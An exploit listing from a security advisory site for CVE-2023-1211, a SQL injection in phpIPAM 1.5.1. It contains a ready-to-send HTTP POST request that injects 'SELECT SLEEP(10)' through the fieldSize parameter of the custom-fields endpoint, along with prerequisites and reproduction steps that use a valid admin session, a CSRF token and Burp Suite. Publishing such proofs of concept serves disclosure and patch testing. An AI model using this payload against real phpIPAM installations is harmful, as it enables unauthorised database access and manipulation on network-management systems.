phpIPAM 1.5.1 SQL Injection

2025.12.09
Credit: CodeSecLab
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2023-1211
CWE: CWE-89

# Exploit Title: phpIPAM 1.5.1 - SQL Injection # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/phpipam/phpipam/ # Software Link: https://github.com/phpipam/phpipam/ # Version: 1.5.1 # Tested on: Windows # CVE : CVE-2023-1211 Proof Of Concept POST /app/admin/custom-fields/edit-result.php HTTP/1.1 Host: phpipam Cookie: PHPSESSID=<valid_session_id>; csrf_cookie=<valid_csrf_token> Content-Type: application/x-www-form-urlencoded csrf_cookie=<valid_csrf_token>&action=add&name=custom_sqli_test&fieldType=enum&fieldSize=0)%3B+SELECT+SLEEP(10)%3B+--+&table=devices&Comment=sql_poc&NULL=YES **Prerequisites:** 1. Valid authenticated session (PHPSESSID cookie) 2. Valid CSRF token (obtain from `/admin/custom-fields/` page first) 3. Target table must exist (default 'devices' table used) 4. Field type must be enum/set to reach vulnerable code path **Manual Test Steps:** 1. Login to phpIPAM 2. Visit `/admin/custom-fields/` to get CSRF token 3. Send POST request with above payload **Note:** Replace `<valid_session_id>` and `<valid_csrf_token>` with actual values from authenticated session. The `fieldSize` parameter injects SQL through enum/set type definition context. Steps to Reproduce Login as an admin user. Intercept and send the malicious request using a web proxy tool such as Burp Suite, ensure it includes a valid session cookie and csrf token. Observe the result


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2025, cxsecurity.com

 

Back to Top